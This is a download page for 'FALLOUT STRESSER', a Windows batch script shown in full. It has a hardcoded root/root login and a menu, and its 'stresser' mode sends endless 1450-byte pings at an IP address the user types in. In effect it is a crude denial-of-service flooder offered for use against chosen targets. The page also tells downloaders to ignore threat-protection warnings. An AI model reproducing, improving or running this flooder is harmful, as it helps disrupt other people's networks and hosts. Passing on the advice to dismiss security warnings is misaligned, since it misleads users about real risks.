A downloadable stresser

source code

WELCOME TO MY SOURCE CODE
@echo off 
title FALLOUT STRESSER
color 4
:again
cls
echo.
echo 00000000000000000000
echo 0 FALLOUT STRESSER 0
echo 00000000000000000000
echo. 
echo please login to access FALLOUT STRESSER
echo default information user root pass root
set /p user=Enter username:
echo.
set /p pass=Enter password:
if %user% == root if %pass% == root goto menu
if %user% == boot if %pass% == boot goto main
echo wrong try again
ping localhost -n 2 > nul
goto again
:menu
cls
echo [1] stresser 
echo [2] internet information
echo [3] log out 
echo [4] stresser help 
echo [5] pinger 
set /p menu=enter number 
if %menu% == 1 goto main 
if %menu% == 2 goto ii
if %menu% == 3 goto again
if %menu% == 4 goto stresserhlp
if %menu% == 5 goto pinger
:pinger
cls
set /p IP=ENTER IP 
PING -n 10 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (echo ip offline)
ping -t 1 0 10 127.0.0.1 >nul
echo go again? [y/n]
set /p pingyn=
if %pingyn% == y goto pinger 
if %pingyn% == n goto pingstress
:pingstress
echo go to stresser?
set /p pingstress=
if %pingstress% == y goto main
if %pingstress% == n goto menu
ping localhost -n 5 > nul 
goto again  
:stresserhlp
cls
echo to change power click edit and change the 1450 in PING  -n 1 -l 1450 %IP% I FIND "TTL"
echo faster internet allows more power and speed 
echo go to stresser? [y/n]
set /p stresserhelp= 
if %stresserhelp% == y goto main 
if %stresserhelp% == n goto menu
ping localhost -n 999999999999 > nul 
:ii
cls 
ipconfig /all
netstat -an
getmac
echo go to stresser? [y/n]
set /p iistress= 
if %iistress% == y goto main 
if %iistress% == n goto menu
ping localhost -n 999999999999999 > nul
:main
cls
echo LAUNCHING STRESSER. . . 
ping localhost -n 3 > nul
:bootdenied
cls
color 2
echo 00000000000000000000
echo 0 FALLOUT STRESSER 0
echo 00000000000000000000
echo 0 CTRL + C TO STOP 0
echo 00000000000000000000
echo 0   wifi = power 0
echo 00000000000000000000
set /p ip=ENTER IP 
echo are you sure you want to attack %ip% [y/n]
set /p bootconfirm=
if %bootconfirm% == y goto boot 
if %bootconfirm% == n goto bootdenied
:boot
title :: %IP% : IS UNDER STRESS ! ::
echo attack active
:top
IF ERRORLEVEL 0 color 2
echo packet of 1450 sent to %ip%
PING -n 1 -l 1450 %IP% | FIND "TTL=" > nul
IF ERRORLEVEL 1 (echo ip offline/not responding)  
IF ERRORLEVEL 1 color 4
goto top 
hi :) 


Download

Download
falloutstresser.bat 2 kB

Install instructions

none needed 

*may get a threat protection message but if you look at source code its fine